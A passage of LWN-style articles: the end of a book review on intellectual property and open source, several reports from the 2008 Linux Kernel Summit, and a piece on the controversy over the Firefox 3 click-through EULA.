There are a few problems here.  No single entity owns the entire Linux
kernel, but that code has been quite vigorously defended against some
strong legal challenges.  (It is interesting, actually, that the author
managed to write this entire book without mentioning SCO once.)  Kernel
developers have also been able to enforce the kernel's copyright numerous
times.  Meanwhile, a quick look at the BusyBox code is sufficient to turn
up copyright assertions from far more than two developers.
Unified ownership of a
code base may be the right thing for some projects, but the reasons cited
here are clearly not applicable.

That complaint notwithstanding, this chapter does contain useful
information that should be kept in mind when accepting patches from
others.

Chapter 12 is about the GPL in particular.  There is a lot of talk about
just what is a derived work under the GPL - does it apply to kernel
modules, for example?  Unfortunately, the answer is "we just don't know."
So, while the chapter is a reasonable summary of how the GPL works, once
again there will be little there for most LWN readers.

Chapter 13 gets into reverse engineering, providing a quick overview of how
it can be done without getting into trouble.  According to the book,
reverse engineering is generally allowed in the US, even to the point of
disassembling proprietary code to learn its secrets.  There are a lot of
pitfalls, though, and the DMCA changes the game significantly.  This
chapter is a good starting point, but anybody wanting to do reverse
engineering in the US will probably want to learn rather more than what is
on offer here.

The final chapter talks about the creation of a non-profit corporation to
own and/or manage a code base.  It's mostly about what's required to
create a corporation and keep it in good standing.  This information may be
useful to some, but it seems a little out of place here.  After that, there
are 80 pages of license lists and the full texts of a number of free
software licenses.  Perhaps it's useful reference material, but it's all
easily available online; it's not clear that dedicating nearly 25% of the
book to this material was necessary.


The subtitle of this book is "a practical guide to protecting code," which
makes one omission especially striking: there is not a word on how a
project should deal with license violations.  There is, by now, a fair
amount of collective wisdom on how such problems should be approached, but
it has not been collected here.  There's also little talk on protecting
projects against software patent problems, no talk of patent pools, and no
talk of related issues like the Microsoft/Novell deal.  Software patents
have cast a big shadow over free software in the US, but the issue is not
really touched upon in this book.


It is also worth noting that the book is very heavily based on US law, and
the author never attempts to look beyond the border.  Certainly it would
never have been possible to cover intellectual property law worldwide, but
this narrow focus is still a little puzzling.  Much intellectual property
law in the US is based on international agreements, so an understanding of
those agreements would help with the larger picture.  A mention of Berne
Convention would not have been out of place, for example.  The other
problem is that free software tends to have little respect for borders;
there are few projects which are limited to a single country.  Even if a
project is based in the US, the existence of contributors elsewhere in the
world is almost certain.  Free software is a global phenomenon; it is not
sufficient to think about US law alone.

Despite these complaints, your editor has to say that this is a valuable
book.  It covers many of the basics of the law in a much clearer way than
has been done before.  Anybody who manages or contributes to a free software
project (in the US, at least) should be familiar with the concepts
discussed here.  And certainly all of the people peppering the net with
IANAL posts would be better informed after reading Intellectual Property
and Open Source.  This book should bring some light to a complex but
crucially important part of the legal code which governs our actions, and
that is a good thing.

		KS2008: Linux 3.0


Prior to this year's kernel summit, Alan Cox had suggested  a possible
topic: devote a development cycle to the removal of old, unused features -
possibly breaking compatibility in places - and release the result as
Linux 3.0.  Alan did not attend the summit itself (the fact that it is
being held in the U.S. was enough to ensure that), but his suggested topic
was the first order of business.  The result: it looks like there is no Linux 3.0
forthcoming right away, and the removal of older features is not on the
agenda.

There was some talk about the cost of maintaining older drivers and
interfaces which are used by few people.  This code requires updates for
API changes and may contain security holes.  In many cases, the drivers are
for hardware which is unable to support features needed by contemporary
software, with the result that users complain about tools like PulseAudio
not working properly.

Linus came into the discussion early to state his unhappiness with the
idea.  The cost of maintaining these old drivers, he asserts, is
essentially zero.  And, in places where there are costs, that is OK with
him as well.  In particular, it's fine with Linus if API changes are a
pain; he wants developers to have to think about whether an API change is
worth the trouble or not.

Linus also pointed out that a lot of hardware which kernel developers see
as being useless junk is, in fact, still useful in many parts of the
world.  There are a lot of people using old stuff, and he does not want to
pull the rug out from under them.  He is also not concerned about claims of
possible security problems with the older code; should such problems exist,
he says, they will affect so few people that it's really not worth the
trouble for any self-respecting cracker to exploit.  So, he concluded, any
sort of driver removal might end up getting rid of all of five drivers,
which is probably not worth the effort.


James Bottomley expressed concern that, by disclaiming concern about things
like security issues, we could be creating a two-tier system of support.
Older hardware may be nominally supported, but no developers are really
interested in keeping the code up, and nobody has the hardware to test
them.

Christoph Hellwig pointed out that creating a major release which only
removed features would be a "marketing disaster."


From there, the discussion began to drift a bit.  Dave Jones suggested (to
general applause) that
a useful thing to deprecate would be the "deprecated" marker used within
the kernel source.  Deprecated functions generate large numbers of
warnings, but nobody bothers to fix them; all the deprecation warnings
really do is mask other, more important warnings.  Christoph noted that the
checkpatch.pl script can also warn about deprecated functions, and that it
was a much better place for it: there, the warnings affect the person
submitting a patch instead of everybody building a kernel.


Then it was suggested that, perhaps, a concerted effort should be made
toward the removal of all warnings from the kernel build.  That idea did
not get very far either.  Quite a few warnings from GCC are bogus, in that
they are complaining about entirely valid code.  Fixing warnings like that
risks masking other problems and introducing bugs in its own right.
Christoph suggested that the warning issue could only really be resolved
when we start shipping GCC with the kernel source.


The sparse tool was discussed for a bit; the warnings generated by sparse
are seen as being more useful much of the time.  But, as Linus noted,
sparse has its own set of bogus diagnostics and is not a perfect solution
either.


Heading back toward the original topic, the developers talked about the
maintenance of ancient system call compatibility interfaces.  Linus talked
about how nice it is to know that we can still run binaries from 1991; we
should be proud of that fact.  The associated cost is, once again, quite
small.  Matt Mackall then said that, if we are continuing to maintain those
interfaces forever, there is little point in discussing the removal of
other interfaces.


The end result from this discussion would appear to be that there will be
no change.  Compatibility with old hardware and interfaces remains a
priority for the kernel, especially as long as the cost of retaining that
compatibility is small.

		KS2008: Minisummit reports


There is an increasing trend toward the use of "minisummits" for the
detailed discussion of issues specific to a kernel subsystem.  Kernel
summits typically include a slot where the results from these sessions can
be reported back to the group as a whole.  The results from three such
events were discussed at the 2008 kernel summit.

Power management

Len Brown went over the power management summit held last July in Ottawa;
some notes from that
gathering were posted here in August.  The talk started with a quick
recap of recent events in the power management area; these include the
mainstream adoption of the tickless kernel, the establishment of lesswatts.org, and the creation of acpica.org, which, among other things,
contains public bugzilla and git servers for the ACPI reference
implementation.

The number of unresolved bugs in the ACPI subsystem is dropping; it was 222
in 2004, but is 59 now (though one should count the 45 bugs which have been
pushed out to a separate suspend/resume category).  New bugs continue to
come in at a steady rate, but the ACPI developers have been working at
addressing them and simultaneously taking care of the backlog.  Most of the
bugs, Len notes, are problems which have always been present in the code;
very few of them are regressions being added by current work.  Andi Kleen
(who was the ACPI maintainer while Len took a short sabbatical) made the
claim that ACPI is the only kernel subsystem which knows how many bugs it
has.

There was some talk of the TI OMAP/ARM architecture which, after some
effort, is now running entirely on current kernel releases.  The flow of
patches back upstream is still small, though, in need of improvement.  Even
suspend and resume work for this architecture, but they are too slow for
current needs.

USB autosuspend was mentioned briefly.  It works, except for the systems
which it breaks completely.  As a result, it is currently disabled by
default.  That, says Len, is an unfortunate situation; disabled-by-default
code, in many cases, might as well have never been written.

Wireless networking

John Linville summarized the wireless networking summit, also held in
Ottawa.  One topic of interest is the cfg80211 API, a wireless
configuration interface which is intended to replace the much-maligned
wireless extensions interface.  One idea being considered is to use DBus to
carry cfg80211 messages, which currently travel via netlink.  That change
would require putting a DBus implementation into the kernel itself, which,
says John, might not be quite as crazy as it sounds.

The wireless regulatory
framework was covered briefly.

Power management is an issue for wireless networking as well.  The wireless
protocols allow a device to announce its intention to go to sleep for a
while; the access point will then buffer packets until the interface wakes
up again.  Linux needs support for this feature, as well as for some more
basic things.  The mac80211 layer, for example, still lacks support for
suspend and resume.

Vendor support is getting better, especially with Atheros hiring a
community developer and beginning to contribute to the ath9k driver (though
not, yet, to the older ath5k driver).  Broadcom, on the other hand, remains
as uncooperative as ever.

There will be another wireless networking summit held in the next year,
almost certainly in Europe.

Containers

The final topic of the session was containers.  Several developers in this
area got together to talk about outstanding issues.  Namespaces in general
were dealt with quickly; there are no real changes planned in this area.
On the other hand, the group decided to shift the checkpoint/restart
functionality over to a "one big syscall" approach; that work has since
been covered in this
article.  The checkpoint developers are still working on getting a
simple case - checkpointing a single process with no outstanding signals or
other complicated situations - working before dealing with the more complex
issues. 

The biggest area of interest would appear to be in resource management -
the general task of keeping containers within a set of resource usage
boundaries.  The biggest problems in this area appear to be in the control
group interface.  The current interface does not offer any sort of
transactional semantics, and it is hard for user-space administrative
processes to learn about resource-oriented events.  Some of these problems
may be addressed via a new FIFO attached to each control group.

There is a lot of work going into I/O bandwidth controllers.  Too much
work, in fact; there are four independent implementations circulating and
they do not appear to be converging.  Some sort of consensus on the way
forward will need to be reached, but it is not, yet, clear what that
consensus will be.  Other work in progress includes a swap controller
(which will be merged with the memory controller), the beginning of a
network traffic controller, and some early effort toward a user-space
library for working with control groups.

A member of the group asked whether the memory controller still requires
the addition of a pointer to the page structure.  The kernel keeps
a page structure for every page of memory; there are a lot of
these structures, so struct page may be the most ruthlessly
compressed data structures in the system.  Adding a new pointer is not a
price that the developers will willingly pay.  Balbir Singh replied that
this pointer is still there for now, but there is a patch which removes
it.  The problem is that this patch comes with a 4% performance loss; work
toward lessening that impact continues.

		KS2008: When should drivers be merged?


The rough consensus in the kernel development community over the last
couple of years has held that device drivers should be merged into the
mainline as soon as possible.  Even if these drivers have significant
problems, it is better to get them into the mainline where they are more
likely to be fixed.  This approach was reconsidered at a Kernel Summit 2008
session, but the group left the policy essentially unchanged.

There are two fundamental lines of thought on this subject.  James
Bottomley started off the session with his feeling that the time before
merging presents the best opportunity to get driver authors to improve
their work.  The possibility of merging the code provides a motivational
incentive which vanishes once the code goes in.  So James likes to hold
code submissions out of the mainline until the worst problems have been
addressed. 

On the other hand, Arjan van de Ven doesn't like the idea of "holding code
hostage" in this way.  From this point of view, about the only reason to
hold drivers out of the mainline is obvious security or user-space API
problems.  In the absence of those, getting the code merged into the
mainline, where it will be more accessible for others to fix, is the best
way to improve bad drivers.

Linus is clearly in the second camp.  Drivers which are out of the mainline
tree, he says, simply do not get better.  People just do not spend much
time looking at out-of-tree code.  Additionally, not accepting drivers from
vendors may put us into a position of having no real traction with those
vendors; each of their subsequent drivers will have the same problems.  By
getting those drivers into the tree and fixing them, we may be able to
push them toward producing better code.  Otherwise, says Linus, we may be
"shooting ourselves in the foot."

On the other hand, Greg Kroah-Hartman reported some strong successes with
his linux-staging tree.  That tree currently hosts some 15 drivers, most of
which are steadily improving over time.  Being in linux-staging is
apparently enough to draw some attention to a driver, and that helps to get
it into better shape.

Much of the discussion was devoted to an attempt to set a line dividing
drivers which can be merged from those which cannot.  There was not a whole
lot of success, though.  It really appears to be a case-by-case sort of
problem.  For example, what about one vendor driver which reads a
configuration file directly from /etc?  Such behavior is normally
frowned upon.  But, if the driver is already out there and being used,
putting it into the mainline will not make things worse - we already have
the problem.  So, especially when the driver is already in widespread use,
we might as well just merge it.

Some ways of mitigating problems with drivers were discussed.  Some of the
worst behaviors could be configured out, allowing the merging of a barely
functional driver which can then be improved in place.  Really nasty
drivers can set a taint bit in the kernel as a warning to developers trying
to track down bugs on the affected systems.  Another idea involves
outfitting badly-written drivers  with strong warnings to keep
other developers from copying the code found therein.

It was suggested that the distributors could ship drivers from the
linux-staging tree, perhaps with the taint feature added.  The answer to
that was that, if the drivers are being shipped by distributors, they might
as well be in the mainline.  Linus stated that anything the distributors
ship should really be merged as well.  There are practical difficulties,
though; Fedora ships the Nouveau driver, which still has not committed to a
stable user-space API.  Until that API stabilizes, Nouveau cannot be merged
into the mainline, but there is still value in getting the driver tested by
Fedora users.

There were a few conclusions from the discussion.  The taint flag for
substandard drivers will probably be added.  There might be a
drivers/staging directory for such drivers as well.  Greg will
take responsibility for getting some of those linux-staging drivers into
the mainline; he has, it was suggested, just become the official crap
maintainer.

		Firefox 3 EULA raises a ruckus


End User License Agreements—or EULAs—are a mainstay of the
proprietary software world that tend to rub free software advocates the
wrong way.  When a EULA is presented in a click-through window as part of
the initial execution of a program, it can really raise some ire
as Mozilla is finding out.  Its plan to present a click-through
license for Firefox 3 on Linux has not met with widespread approval; quite the
reverse in fact.


The issue has been kicking around since at least
last May, when Fedora folks noticed that Firefox 3 builds moved the EULA popup
window from the installer—which Linux folks rarely see—to the
first time Firefox is run.  More recently the issue erupted in the Ubuntu
community when a user filed a
bug
that reads, in part:

STARTING UP A CERTAIN 3.0.2 VERSION OF FIREFOX BROWSER MAKES AVAILABLE TO
YOU A VERY CAPITAL END USER LICENSE AGREEMENT. THIS AGREEMENT IS OBNOXIOUS
and largely irrelevant to Ubuntu users. 


The predictable outcry followed, mostly because people who are used to free
software have a visceral reaction to seeing a click-through EULA.  For that
reason alone it is a poor choice by Mozilla, at least on Linux.
Windows users, who make up a substantial portion of the Firefox userbase, are
generally unfazed by EULAs as they are confronted by them
regularly—generally blithely clicking through with little or no
hesitation. 


There are a number of objections to the Mozilla EULA, starting with the current
text of the license.  Mozilla Corporation chairperson Mitchell Baker agreed
with the critics of the license text, saying "the most important
thing here is to acknowledge that yes, the content of the license
agreement is wrong."  New
license text is now available in draft form, but it still doesn't
address an underlying issue: do we need to consult a lawyer when we install
or run 
free software?


One of the guiding principles of free software is that it doesn't limit
what "end users" can do with the software, it only limits those who wish
to distribute it.  When a page or two of legalese—undoubtedly toned
down from what the lawyers would really like—is presented to a
new user, what exactly are they supposed to do with it?  Users have rights
under free software licenses, and it is important that they can find out
about them, but it is fairly rare for a program, or even a distribution, to
require a user to click through a copy of the license.


Mozilla's position is that they need to protect their trademarks as well as
inform users about the web services used to try to detect phishing and
malware sites.  In answer to those who think a click-through EULA is
unnecessary—often using Linux distributions as a
counterexample—Baker points
out: 

It's hard to tell what's "necessary." It's an unsettled area and may
vary across different locales. We've traditionally been more conservative
on this point than many Linux distros.


So far, Mozilla does not seem willing to budge from its requirement to show
the EULA as a click-through agreement.  Fedora was able to get a waiver of
sorts for Fedora 9 which allowed shipping Firefox 3 without the EULA while
the projects worked out language they both could live with.  In Fedora 9,
Firefox opens to a page
that describes the web services when it is run for the first time.
Some kind of compromise along these lines for Linux distributions would
seem to satisfy most of the concerns for both sides, but other than for
Fedora 9, that solution has not been blessed by Mozilla.


Fedora Engineering
Manager Tom "spot" Callaway has an excellent overview of the history
as well as a nice analysis of the EULA.  He 
notes that almost of all of the terms in the EULA are either covered by
applicable 
laws or by the Mozilla Public License (MPL).  None of that really matters
though as distributions really only have two choices as outlined
by Ubuntu leader Mark Shuttleworth:

Mozilla Corp asked that this be added in order for us to continue to call
the browser Firefox. Since Firefox is their trademark, which we intend to
respect, we have the choice of working with Mozilla to meet their
requirements, or switching to an unbranded browser. 


That is the risk that Mozilla takes; if it is too heavy-handed in what it
requires to call a browser "Firefox", distributions will take the code
without the trademarks and call it "Iceweasel" as Debian has
or "abrowser" which is the Ubuntu equivalent.  The Iceweasel "fork" was
made because 
Mozilla objected to Debian backporting security fixes into older browsers
without its consent, while abrowser has come about because of the EULA
issue.  Given that Linux users were some of the earliest and most
enthusiastic adopters of Firefox, it is truly unfortunate that
many may have to run it under other names.


There is an issue that may be getting lost in the shuffle here as well.
Fedora board member Jef Spaleta has expressed concerns
about how to notify users about web services:

"We" as in everybody doing open source software has absolutely no fraking
idea as to how to appropriately notify users about the services agreements
associated with on-by-default web services. "We" collectively aren't giving
it a lot of thought. "We" have this amorphous concept about the online
desktop experience which is going to deeply integrate web services and
enhance the day-to-day desktop user experience. But that enhancement comes
at a cost..and that cost is the complication associated with "terms of
service" for a vast array of different web service vendors.


Web services clearly bring along a number of additional concerns.  There
are privacy issues to consider.  In many places, particularly Europe, there
are fairly stringent 
requirements regarding data collection and retention that are required to
be communicated to users.  How that will be done for free software that use
these services is an open question.  As Spaleta points out, Mozilla may be
the only 
free software organization that is even looking at the problem.


The EULA mess is a situation that certainly could have been handled better by
Mozilla.  One hopes that some kind of compromise can be worked out so that
users aren't poked in the eye with legal documents—that aren't even
valid in many jurisdictions—and distributions don't feel like they
need to fork to preserve their freedoms.  Mozilla definitely has some
legitimate interests to protect, but it needs to find a saner way to do
that. 


There is hope that is happening as Baker has described in an update
on her blog:

We've come to understand that anything EULA-like is disturbing, even if
the content is FLOSS based.  So we're eliminating that.  We still feel
that something about the web services integrated into the browser is
needed; these services can be turned off and not interrupt the flow of
using the browser. We also want to tell 
people about the FLOSS license — as a notice, not as as EULA or use
restriction.  Again, this won't block the flow or provide the unwelcoming
feeling that one comment to my previous post described so eloquently.


More details are imminent, but it looks like this could all resolve amicably.

		The 2008 Linux Kernel Summit


The 2008 Linux Kernel Summit was held September 15 and 16 in
Portland, Oregon, immediately prior to the Linux Plumbers Conference.  At
this invitation-only meeting, some 80 developers discussed a number of
issues relevant to the kernel and its future development.  The following
reports were written by Jonathan Corbet, who attended the event and was a
member of its program committee.

This reporting was sponsored by LWN's subscribers; if you appreciate this
kind of content, please consider subscribing to
LWN and helping us create more of it.

Day 1

The sessions held on the first day were:


 Linux 3.0: should the developers 
     do a Linux 3.0 release with a focus on dumping older, unneeded code?

 Minisummit reports: reports from
     gatherings of power management, wireless networking, and containers
     developers.

 When should drivers be merged?  A
     wide-ranging discussion on the trade-offs between getting drivers into
     the kernel quickly and waiting until they are up to kernel coding
     standards. 

 Filesystem and block layer
     interaction; what contemporary file systems need to be able to get
     the most out of storage devices.

 Cross-subsystem issues; how do we
     evolve subsystems which are heavily used by several other parts of the
     kernel? 

 Tools, and the new Patchwork tool in
     particular. 

 Bootstrap code.  Why does every
     distributor throw together its own initrd/initramfs code, and can that
     situation be improved?

 Kernel quality and release process,
     various discussions on how to produce better kernels and a
     near-decision to move to a one-week merge window.


Day 2


 Tracing.  A lengthy discussion on 
     user requirements for kernel tracing and how those requirements might
     eventually be met.

 Documentation.  We always want more
     and better documentation, but what documentation would be most useful
     to the development community?

 There was a brief bug-fixing session aimed at the top entries on the
     KernelOops.org.  Over the course
     of half an hour, the developers were able to fix 13 of the top 14
     bugs.  It was widely agreed that this was a productive use of time
     which will probably be repeated at future events.

 More minisummit reports covering
     virtualization, networking, and kernel bloat.

 All about threads; kernel thread pools
     and threaded interrupt handlers in particular.

 Projects with large user-space
     components; how can we make it easier for the direct rendering
     infrastructure project to work with the mainline kernel?

 Rafael Wysocki led a section on the new suspend/resume
     infrastructure.  Most of that talk was concerned with the API, which
     was covered here back in
     March, so it will not be written up again now.  Some changes will
     likely be made; stay tuned to LWN for the details.
     
     Linus did ask the crowd how many people were still unable to suspend
     their laptops.  The number of hands raised was quite small; things
     have clearly gotten better in this area.

 Fixing the Kernel Janitors Project.
     How can we do a better job of bringing new developers into the kernel
     community? 


The closing party (which was also the Linux Plumbers Conference opening
party) was the venue chosen for the annual election of members to the Linux
Foundation's Technical Advisory Board.  The move out of the regular kernel
summit sessions was intended to allow a wider group of people to
participate in the election.  It would appear to have been successful in
that regard; there were record numbers of both candidates and voters.  The
board members elected this time around were James Bottomley, Kristen
Carlson Accardi, Chris Mason, Dave Jones, Chris Wright, and Christoph
Hellwig.  Christoph was elected to a one-year term; all of the others will
serve two-year terms.


Next year's kernel summit is currently scheduled for October 18 to 20
in Tokyo, Japan.

		KS2008: Filesystem and block layer interaction


Much is happening with Linux filesystems currently; this is a situation
which is likely to persist for some time.  As filesystems develop, it is
becoming clear that there need to be some changes in the interactions
between the filesystem and block I/O layers.  This kernel summit session
discussed some of the places where changes are needed, but did not get much
into their implementation.

Chris Mason is the lead developer of the up-and-coming btrfs filesystem.
One of the items on Chris's shopping list is a way for filesystems to
obtain a better understanding of the topology and nature of the storage
system underneath them.  He would like, for example, to be able to
determine whether a filesystem is sitting on a solid-state device or on a
traditional rotating disk.  Certain decisions will be made very differently
depending on the nature of the underlying device; filesystems stored on
solid-state drives, for example, can be laid out without being concerned
about seek times.

The topology of the device also matters.  Especially when multipath storage
systems are in use, the filesystem would like to be able to understand what
the various paths are, and to be able to partition it into truly
independent failure domains.  With this information, filesystems can find
the optimal ways to perform I/O to the underlying devices.

Information needs to flow the other way as well.  Upcoming filesystems will
perform extensive checksumming on data, so they will be able to inform the
storage layer when a block has gone bad.  For mirrored devices, that will
enable the storage driver to recover the block from an uncorrupted mirror -
if the filesystem is able to tell it which mirror went bad.

Chris asked for information on storage latency - how long operations
can be expected to last - and the optimal I/O sizes and alignments.  The
motivation behind this request is to optimize I/O to solid-state devices.
Here Linus jumped in and suggested that the filesystem developers should
"take a deep breath and wait a year."  Solid-state devices will change a
lot over that time, and many of the problems which exist now will be gone
by then.  So filesystems designed for today's solid-state drives will
contain a lot of useless code by the time those drives are truly
widespread.  It is better, Linus says, to just treat them as a fast,
random-access disk and not worry about the details.

Another request was for filesystems to be able to allocate their own
bio structures, rather than using the block layer's allocation
functions.  That would allow the filesystems to store their own private
data with the bio without the need to tack on a chain of separate
structures via the bi_private pointer.  There's also a general
need to rework the address space 
operations to facilitate better layout and more rational locking.

The kswapd process is a bit of a problem for contemporary filesystems.
Kswapd is charged with freeing up pages for the memory allocator; it needs
to be able to get its job done at times when system memory is very tight.
Currently kswapd will attempt to write out dirty pages so that they can be
freed.  The problem is that this writeout can require more memory to carry
out; as filesystems become more complex, the amount of extra memory needed
seems to be growing.  That can lead to deadlocks if that extra memory is
not available.  So the filesystem developers would like kswapd to concern
itself exclusively with clean pages, which can be freed without performing
I/O.

One answer that came back was that the writepage() VFS callback
can be treated as advisory.  That is what btrfs does now; if a
writepage() call comes in the context of a process with the
PF_MEMALLOC bit set (meaning that the system is trying to free
memory), the call will simply fail.  That is all legal, but it can hurt
performance.  

In the end, kswapd does writeout because, historically, it was possible for
a Linux system to end up with all of its pages being dirty.  In that kind
of situation, writeout is the only way to make memory available again.  But
current kernels are able to keep close tabs on how much of memory is dirty
at any given time, and they can avoid getting into that kind of situation.
So writeout in kswapd is no longer necessary; it can, instead, be handled in
contexts where memory is not in critically short supply.  This change
seems likely to be made in the near future.

The final topic, discussed briefly, was I/O barriers.  The filesystem
developers would really like it if the more complex storage layers - such
as the software RAID and device mapper code - would implement write
barriers.  That is a hard thing to do with the current concept of barriers,
though; the performance costs will be high.  James Bottomley noticed that a
better job could be done with a more complex barrier API.  But it is not
clear whether the benefits that would come would be worth the extra cost.

		KS2008: Cross-subsystem interactions


Jean Delvare has an interesting job: he is the maintainer of the i2c
subsystem.  Most users don't think much about i2c devices, but kernel
developers involved with a number of subsystems are well aware of them.
For example, a webcam driver is often three drivers internally: one for the
camera controller, one for the camera itself, and one for the i2c
connection which allows the host system to configure the camera.  There are
i2c buses lurking within a number of other devices, so the i2c layer pops
up in a number of places.  Thus, changes to the i2c layer affect quite a
few developers in other parts of the kernel.

Jean talked about some of the lessons he has learned over the years.  It is
necessary to cleanly separate the subsystems.  In each case, developers
need to know the subsystems their code works with and the associated
maintainers; that knowledge will make it much easier to get changes
accepted.  All subsystems should be treated equally, and subsystem
maintainers should be warned about changes as early as possible.  It is
best to work with those maintainers to chart out a path which makes the
changes as easy as possible for everybody to deal with.

So where do the problems come in?  The universal answer was API changes,
especially when there are disagreements over how an API should look.
Linus pointed out that disagreements often come about when the
maintainership boundaries are unclear.  There is, for example, a lot of
architecture-specific code which is essentially part of the PCI layer,
leading to conflicts between architecture and PCI maintainers.  Sometimes
the only real solution is to refactor the code - not a simple or quick
process. 


Nick Piggin talked about problems getting maintainers to accept new APIs.
Part of his difficulty seems to stem from his idea that, when an API needs
to change, the maintainers of affected subsystems should do the work of
adjusting to the change.  Strangely enough, people tend to react poorly
when others create more work for them.  Still, Nick would like subsystem
maintainers to help out when an API change needs to happen.  A developer
who fixes a buggy API should be rewarded; forcing that developer to fix all
users of the affected API seems, instead, like punishment.

Linus disagreed with that reasoning, though.  He noted that there is a lot
of code in the kernel which is effectively unmaintained; there is nobody
else who can take on the work of fixing it when an API changes.  And, he
says, some developers are far too eager to make API changes.  Anything
which causes them to hesitate, and to maybe think about how to minimize the
pain caused by the change, is a good thing.

There were no real conclusions from this session; having said their piece,
the developers moved on to the next topic.

		KS2008: Development tools


Paul Mackerras was the leader of a kernel summit session dedicated to
development tools.  In the end, though, only one tool was discussed: the Patchwork system used by the
PowerPC development community.  Patchwork is a patch management system; its
job is to ensure that posted patches are properly tracked, reviewed, and
disposed of.

The Patchwork system can be configured to watch a mailing list; whenever a
message containing a patch is posted, it is added to the database.  Any
followup discussion is also captured and stored with the patch.
Maintainers can go into the system, review patches, delegate them to other
maintainers, and mark them for their final destination.  Patches which are
set to be merged into a subsystem tree can be grouped into bundles; the
maintainer can then extract them as a mailbox file suitable for feeding to
the git-am tool.

A nice feature of Patchwork is that it can recognize messages containing
Acked-by lines and automatically note the acks in the original
patch.

Patchwork was generally recognized as a useful tool; the developers began
discussing whether it should be used for the kernel as a whole.  It was
noted that all maintainers need to commit to using it, or it will quickly
clog up with patches that nobody is paying attention to.  Nobody has any
illusions that all kernel developers can be convinced to start working with
this new tool; Andrew Morton stated that he was probably too stuck in his
way to make use of it.  Some alternatives - such as having patches
automatically age out of the system - were discussed.  But it was generally
agreed that trying to deal with the full linux-kernel mailing list would
probably be too big of a step at this time.

So a more likely outcome is that one or more subsystems will start
experimenting with Patchwork, perhaps running it on one of the kernel.org
systems.  The SCSI or ext4 subsystems may be the early adopters here.  If
that trial works out, expanding the use of Patchwork may be considered.

		KS2008: Bootstrap code


Initramfs is a useful tool; it allows a filesystem (in cpio format) to be
tacked on to the end of the kernel executable image.  When the kernel
boots, it unpacks the filesystem into RAM and mounts it as the initial root
filesystem.  Therein will be found enough bootstrap code to get the system
properly initialized and running from the real root filesystem.  It is
possible to boot a system without an initramfs, but essentially all
distributors make use of this facility.

Dave Jones, the Fedora kernel maintainer, made the claim that the initramfs
code is one of the most boring parts of any distribution.  Even so, all
distributors still roll their own initramfs code.  It is a pain, and it
doesn't make any sense.  So Dave looked into what's going on in this code
to see if the situation could be made any better.

The Red Hat initramfs image, used in Fedora, is the product of many years'
worth of heritage and workarounds.  Whenever the developers have run into
an early bootstrap problem, they have thrown another hack into the
initramfs code to make things work again.  This code is ugly, but nobody
wants to switch to anybody else's version.  They fear that a different
initramfs will lack all those hard-earned workarounds, and, besides,
everybody feels that their particular solution is the best.

So what does the initramfs code do?  Its job is to load any necessary
storage drivers, then wait for the storage devices to settle.  The swap
system needs to be enabled.  If the swap partition contains a hibernation
signature, a resume from disk operation is begun.  Otherwise the initramfs
code must find the root filesystem (an operation which may require setting
up the device mapper or getting networking going), mount it, then switch
over to the real operating system.  Red Hat's version has to support a wide
variety of root filesystems, and contains a lot of crufty code.  


The situation is pretty much the same with the other distributors.  Where
things differ, it often has to do with differing kernel configurations,
and, in particular, differences of opinion over whether specific code
should be built into the kernel or built as a module.

Differences between initramfs setups can create some annoying problems.  
Sometimes these differences are enough to cause some kernel configurations
to fail on one distribution.  It would make life easier for everybody if a
more uniform set of tools were used for early system initialization.  This
code could be part of the kernel tree, and it could change, when needed, in
response to kernel changes.  In the end, things would just work.

There's a few details that would have to be dealt with.  Some distributions
use the in-kernel hibernation (suspend-to-disk) code, while others are
using TuxOnIce.  It seems like maybe
it's time for everybody to standardize on one hibernation solution.  While
most distributions have long since switched over to the parallel ATA
drivers, some are still using the older IDE subsystem.  Not everybody
supports root filesystems on iSCSI devices.  And so on.  But these are
problems  which
should be amenable to a solution.

Dave is going to start by adding a "make mkinitrd" option to the kernel
build system; it will create a version of the Fedora mkinitrd for now.
Others will be encouraged to join in and help make it work for everybody.

Beyond that, Dave suggested that the developers could start to build a set
of reference boot scripts in the kernel.  Once again, this is an area where
distributors tend to roll their own code; they could benefit from bits of
code showing the best way to initialize parts of the system.  Al Viro
pointed out that there will be problems coming from the fact that different
distributors use different shells in their early boot code.  That led to an
extended discussion of the evils of nash and the celebrations which will
ensue upon its eagerly-awaited demise.

There was some brief discussion of klibc - a small version of the C library
intended for use in initramfs code.  That project has been stalled for some
time due to lack of interest; it could probably be restarted without too
much trouble.  The problem is that, despite all their wishes, distributions
often end up having to use glibc in their initramfs filesystems.  The
biggest driver here appears to be internationalization, which is not
properly handled by the various stripped-down libc implementations out
there.

Getting back to the concept of a uniform set of initramfs tools, Linus
suggested that the process could start with some baby steps.  The kernel
could include some bits of code which are automatically added into whatever
initramfs image the distributor provides.  There are challenges to making
that work too, of course.  The best way, perhaps, is just to dump
everybody's initramfs and  start over with a new, clean version.  That
project may get underway before too long.

		KS2008: Kernel quality and release process


The first day of the 2008 kernel summit concluded with two sessions
dedicated to the quality of our 
kernels and the process used to produce them.  Arjan van de Ven started off
talking about the data acquired by the Kerneloops project.  In a short period of
time, Arjan has accumulated information from tens of thousands of kernel
crashes and warnings.  From that data, he is able to draw some conclusions
about how the kernel fails and how well the developers are doing at fixing
problems.

Initially, Kerneloops worked by grabbing oops reports from the kernel
mailing lists.  Since then, a number of distributors have added facilities
to find oops tracebacks in the kernel logs and ship them off to the project
(after obtaining confirmation from the user, of course).  This tool is now
the source of the vast majority (99%) of the oops reports in the system.
One of the things Arjan noted is that many of the biggest problems
encountered by users are never reported on the kernel mailing lists; the
problem reports one sees there are not indicative of what users are
actually running into.


At any given time, the top ten bugs account for a full 60% of the reports;
the top 25 make up 70%.  So, while there still appear to be many ways to
make a kernel crash, most user problems are caused by a very small number
of bugs.  Fix those problems, and most users will see their troubles go
away.  At the other end of the scale, almost half of the bugs are
represented by a single report.  While some of those reports will be the
result of obscure timing-related issues, most of them are more likely to be
the result of hardware problems.  So a lot of the reported problems do not
really require any action from the developers.


A number of reported bugs result from the utrace code.  Utrace is an
out-of-tree tracing enhancement shipped by Fedora; it seems that, perhaps,
this code still isn't quite ready for prime time.  There's also quite a few
which are attributable to binary-only modules.


Linus asked how many developers get the occasional oops reports mailed out
by the project; maybe ten people raised their hands.  Linus would like to
see that report mailed to a lot more people, and the regression reports
too.  If this information got to more developers, perhaps more bugs would
get fixed.


Regressions

That was a natural point to move into a discussion of regressions led by
Rafael Wysocki.  Rafael put up a number of plots of regression counts and
associated fixes; by fitting a logarithmic function to regression reports
and a line to fixes, he was able to extrapolate the point where the two
curves intersect and, in theory, all regressions are fixed.  It turns out
that recent kernels have been released 1-3 weeks before this point is
reached.  According to his data, Rafael suggests that the optimal time to
